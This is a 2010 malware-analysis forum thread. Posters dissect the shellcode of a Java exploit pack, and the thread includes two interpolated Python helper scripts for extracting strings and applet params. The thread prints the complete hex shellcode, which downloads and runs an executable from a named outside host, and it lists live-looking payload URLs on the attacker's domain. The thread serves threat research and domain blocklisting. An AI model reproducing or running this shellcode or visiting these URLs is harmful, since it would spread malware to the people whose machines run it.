Malware Domain List

Malware Related => Malware Analysis => Topic started by: Garlando on February 13, 2010, 06:15:06 am

Title: Shellcode analysis?
Post by: Garlando on February 13, 2010, 06:15:06 am
Hi,
I was investigating a Java exploit and decided to take a look at the shellcode.

Code: [Select]
505351525657559CE8000000005D83ED0D31C064034030780C8B400C8B701CAD8B4008EB098B40348D407C8B403C5657BE5E01000001EEBF4E01000001EFE8D60100005F5E89EA81C25E010000526880000000FF954E01000089EA81C25E01000031F601C28A9C356302000080FB007406881C3246EBEEC604320089EA81C24502000052FF955201000089EA81C2500200005250FF95560100006A006A0089EA81C25E0100005289EA81C278020000526A00FFD06A0589EA81C25E01000052FF955A01000089EA81C25E010000526880000000FF954E01000089EA81C25E01000031F601C28A9C356E02000080FB007406881C3246EBEEC604320089EA81C24502000052FF955201000089EA81C2500200005250FF95560100006A006A0089EA81C25E0100005289EA81C2A6020000526A00FFD06A0589EA81C25E01000052FF955A0100009D5D5F5E5A595B58C30000000000000000000000000000000047657454656D705061746841004C6F61644C696272617279410047657450726F63416464726573730057696E4578656300BB89F289F730C0AE75FD29F789F931C0BE3C00000003B51B02000066AD03851B0200008B707883C61C03B51B0200008DBD1F020000AD03851B020000ABAD03851B02000050ABAD03851B020000AB5E31DBAD5603851B02000089C689D751FCF3A65974045E43EBE95E93D1E003852702000031F69666ADC1E00203851F02000089C6AD03851B020000C3EB100000000000000000000000000000000089851B0200005657E858FFFFFF5F5EAB01CE803EBB7402EBEDC355524C4D4F4E2E444C4C0055524C446F776E6C6F6164546F46696C6541007064667570642E6578650063726173682E70687000687474703A2F2F3139322E616E74697672323030392E636E2F73656E632E657865009026
Code: [Select]
(the same shellcode pasted as raw bytes; the rendering is mis-encoded, and the only printable strings that survive are: PSQRVWU ... GetTempPathA LoadLibraryA GetProcAddress WinExec ... URLMON.DLL URLDownloadToFileA pdfupd.exe crash.php http://192.antivr2009.cn/senc.exe)
It uses URLDownloadToFileA to download the malware as pdfupd.exe from hxxp://192.antivr2009.cn/senc.exe.
But what left me wondering is the string 'crash.php'. Can anyone explain to me the purpose of this string? I'm not very talented in analysing malware, so if anyone can clarify this to me I'd be very happy.

thanks Garland
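The quickest way to read a blob like the one above is to hex-decode it and pull out the string table, which is exactly where the API names, file names and the download URL come from. The extractor below is an added example and is not part of Garlando's post; it runs on a constructed sample that only reproduces the layout of the posted shellcode (a register-saving prologue, then NUL-separated API names, DLL and file names and the URL), and the classification heuristics and the "download-and-execute" flag are my own. It also shows the usual false positive: the prologue bytes 50 53 51 52 56 57 55 (push eax/ebx/ecx/edx/esi/edi/ebp) are all printable and come out as the string "PSQRVWU".

```python
import re
from typing import Dict, List

# Constructed sample (not the full blob from the post): a few opcode bytes laid
# out like the posted shellcode, i.e. a register-saving prologue followed by a
# NUL-separated table of API names, file names and the download URL.
SAMPLE_SHELLCODE = (
    b"\x50\x53\x51\x52\x56\x57\x55\x9c\xe8\x00\x00\x00\x00\x5d"  # push regs; pushfd; call $+5; pop ebp
    + b"\x00" * 8
    + b"GetTempPathA\x00LoadLibraryA\x00GetProcAddress\x00WinExec\x00"
    + b"\xbb\x89\xf2\x89\xf7\x30\xc0\xae\x75\xfd"  # fragment of the import-resolver loop
    + b"URLMON.DLL\x00URLDownloadToFileA\x00pdfupd.exe\x00crash.php\x00"
    + b"http://192.antivr2009.cn/senc.exe\x00\x90\x26"
)
SAMPLE_HEX = SAMPLE_SHELLCODE.hex().upper()

URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
# Win32 API name: CamelCase identifier with at least one lowercase letter, so
# that runs of printable opcode bytes (all caps, e.g. "PSQRVWU") do not match.
API_RE = re.compile(r"[A-Z][A-Za-z0-9]*[a-z][A-Za-z0-9]*")
# APIs that, seen together, mark a download-and-execute stager (my heuristic).
STAGER_APIS = {"URLDownloadToFileA", "WinExec"}


def hex_to_bytes(hex_text: str) -> bytes:
    """Decode a hex dump as pasted on the forum; whitespace is tolerated."""
    cleaned = re.sub(r"\s+", "", hex_text)
    if len(cleaned) % 2:
        raise ValueError("odd number of hex digits: blob is truncated or mis-copied")
    return bytes.fromhex(cleaned)


def extract_strings(blob: bytes, min_len: int = 4) -> List[str]:
    """Return printable ASCII runs of at least min_len bytes, in blob order."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(blob)]


def classify(strings: List[str]) -> Dict[str, List[str]]:
    """Bucket strings the way an analyst reads a string table."""
    buckets: Dict[str, List[str]] = {"urls": [], "dlls": [], "files": [], "apis": [], "other": []}
    for s in strings:
        low = s.lower()
        if URL_RE.match(s):
            buckets["urls"].append(s)
        elif low.endswith(".dll"):
            buckets["dlls"].append(s)
        elif low.endswith((".exe", ".php")):
            buckets["files"].append(s)
        elif API_RE.fullmatch(s):
            buckets["apis"].append(s)
        else:
            buckets["other"].append(s)
    return buckets


def summarize(hex_text: str) -> Dict[str, object]:
    """Decode, extract, classify, and flag the download-and-execute pattern."""
    blob = hex_to_bytes(hex_text)
    buckets = classify(extract_strings(blob))
    report: Dict[str, object] = {"size": len(blob)}
    report.update(buckets)
    report["download_and_execute"] = STAGER_APIS.issubset(buckets["apis"])
    return report


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_HEX).items():
        print(f"{key}: {value}")
```

Run it on the posted hex instead of SAMPLE_HEX and the same buckets fall out; the odd-length check in hex_to_bytes is there because a blob copied from a forum post is often missing a nibble, and bytes.fromhex would otherwise fail with a much less helpful message.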
Title: Re: Shellcode analysis?
Post by: MysteryFCM on February 14, 2010, 09:37:00 pm
What's the URL that houses this?
Title: Re: Shellcode analysis?
Post by: Garlando on February 15, 2010, 12:17:11 pm
What's the URL that houses this?

it's down now, but this site offers the same exploit pack

Code: [Select]
miamiheraldsi.com/in0/index.php
It's in the params of the Java exploit.
Title: Re: Shellcode analysis?
Post by: MysteryFCM on February 15, 2010, 01:24:44 pm
Ah, came across that one earlier ... some lovely code it's got. The shellcode is an exploit (not identified what crash.php is for yet), and the payloads are:

Code: [Select]
http://miamiheraldsi.com/in0/l.php?i=7
http://miamiheraldsi.com/in0/l.php?i=14

Doesn't seem to matter what you put for the i= param, still gives the same content length (131K, MD5: 73B4B7CBE2E65B5385DB30F070534F21).
Title: Re: Shellcode analysis?
Post by: SysAdMini on February 15, 2010, 01:29:07 pm
Ah, came across that one earlier ... some lovely code it's got. The shellcode is an exploit (not identified what crash.php is for yet), and the payloads are:

Code: [Select]
http://miamiheraldsi.com/in0/l.php?i=7
http://miamiheraldsi.com/in0/l.php?i=14

Doesn't seem to matter what you put for the i= param, still gives the same content length (131K, MD5: 73B4B7CBE2E65B5385DB30F070534F21).

Added this morning.

http://www.malwaredomainlist.com/mdl.php?search=miamiheraldsi.com&colsearch=All&quantity=50
Title: Re: Shellcode analysis?
Post by: Garlando on February 15, 2010, 01:39:29 pm
Ah, came across that one earlier ... some lovely code it's got. The shellcode is an exploit (not identified what crash.php is for yet), and the payloads are:

Code: [Select]
http://miamiheraldsi.com/in0/l.php?i=7
http://miamiheraldsi.com/in0/l.php?i=14

Doesn't seem to matter what you put for the i= param, still gives the same content length (131K, MD5: 73B4B7CBE2E65B5385DB30F070534F21).

Sorry, I mean the param tags in the decoded JavaScript:

<applet src=gsb50.jar ....something other....>
<param name='sc' value='the shellcode'>
</applet>
Title: Re: Shellcode analysis?
Post by: MysteryFCM on February 15, 2010, 01:43:02 pm
hehe cool :) (related to learn-to-knit.com (site that led me to it)). I've just added the payload URLs to MDL :) (just got back home so finally able to analyze it)

@Garlando,
There are actually two. The first (commented out for some reason, likely because of the second one) points to l.php?i=10, the second points to i=9. Again however, I can't find any reference or active URL for pdfupd.exe (not run it on the test machine yet, but guessing pdfupd.exe is the filename it's downloaded as) nor crash.php.
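Pulling the shellcode out of the decoded JavaScript means reading the 'sc' param of every applet tag, including the one MysteryFCM notes is commented out, which a naive regex over the live markup would miss. The parser below is an added example, not code from the thread or from the exploit pack; it runs on a constructed page that mimics the two-applet layout described above (short placeholder hex in place of the real shellcode, and example.invalid in place of the real loader domain), accepts both the src= form in Garlando's snippet and the usual archive= attribute, and re-parses HTML comment bodies so the commented-out applet is reported too.

```python
import re
from html.parser import HTMLParser
from typing import Any, Dict, List, Optional

# Constructed sample modelled on the decoded JavaScript the thread describes:
# one applet commented out, one live, each passing its shellcode in the 'sc'
# param. The hex values are short placeholders, not the real shellcode, and
# the loader URLs use a reserved example domain.
SAMPLE_HTML = """
<!-- <applet code="Main.class" archive="gsb50.jar" width=1 height=1>
  <param name='sc' value='9090CC'>
  <param name="u" value="http://example.invalid/in0/l.php?i=10">
</applet> -->
<applet code="Main.class" src=gsb50.jar width=1 height=1>
  <param name='sc' value='5053 5152 9C'>
  <param name="u" value="http://example.invalid/in0/l.php?i=9">
</applet>
"""


class AppletParamParser(HTMLParser):
    """Collect the <param> values under each <applet>, including applets that
    sit inside an HTML comment (HTMLParser hands comment bodies to
    handle_comment instead of tokenizing them)."""

    def __init__(self) -> None:
        super().__init__()
        self.applets: List[Dict[str, Any]] = []
        self._current: Optional[Dict[str, Any]] = None

    def handle_starttag(self, tag, attrs) -> None:
        a = dict(attrs)
        if tag == "applet":
            # the thread's snippet uses src=, real pages use archive=; accept both
            self._current = {"archive": a.get("archive") or a.get("src"),
                             "params": {}, "commented_out": False}
            self.applets.append(self._current)
        elif tag == "param" and self._current is not None:
            self._current["params"][a.get("name")] = a.get("value")

    def handle_endtag(self, tag) -> None:
        if tag == "applet":
            self._current = None

    def handle_comment(self, data) -> None:
        # A commented-out applet is still evidence: parse the comment body too.
        inner = AppletParamParser()
        inner.feed(data)
        inner.close()
        for applet in inner.applets:
            applet["commented_out"] = True
        self.applets.extend(inner.applets)


def extract_shellcode(html: str) -> List[Dict[str, Any]]:
    """Return one record per applet carrying an 'sc' param, with the hex
    cleaned and decoded (sc_bytes is None when the hex is not well-formed)."""
    parser = AppletParamParser()
    parser.feed(html)
    parser.close()
    records: List[Dict[str, Any]] = []
    for applet in parser.applets:
        sc = applet["params"].get("sc")
        if sc is None:
            continue
        cleaned = re.sub(r"\s+", "", sc)
        try:
            sc_bytes: Optional[bytes] = bytes.fromhex(cleaned)
        except ValueError:
            sc_bytes = None
        records.append({
            "archive": applet["archive"],
            "commented_out": applet["commented_out"],
            "params": applet["params"],
            "sc_hex": cleaned.upper(),
            "sc_bytes": sc_bytes,
        })
    return records


if __name__ == "__main__":
    for rec in extract_shellcode(SAMPLE_HTML):
        state = "commented out" if rec["commented_out"] else "live"
        print(f"{rec['archive']} ({state}): {len(rec['sc_bytes'] or b'')} bytes of shellcode, "
              f"loader URL {rec['params'].get('u')}")
```

The decoded sc_bytes of each record can be handed straight to a string extractor; keeping the commented-out applet in the output matters because the loader URL it names (i=10 in the thread) is still infrastructure worth recording even though the browser never ran it.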